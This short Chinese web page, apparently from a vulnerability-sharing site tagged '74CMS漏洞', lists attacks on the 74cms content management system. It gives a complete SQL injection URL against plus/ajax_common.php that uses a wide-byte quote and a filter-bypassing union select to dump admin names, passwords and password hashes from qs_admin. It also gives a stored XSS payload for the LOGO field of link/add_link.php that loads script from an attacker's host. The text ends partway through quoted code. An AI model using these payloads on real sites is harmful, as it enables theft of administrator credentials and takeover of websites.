作者:暂时不知道 Exp: http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23
当前标签
74CMS漏洞
这个XSS好像是从12年3.1开始就存在的吧,到现在的3.4还是没有修复。 漏洞页面:link/add_link.php 友情链接:LOGO处填写><script src=http://xss地址></script> //将进行16进制编码 add_link.php $set...
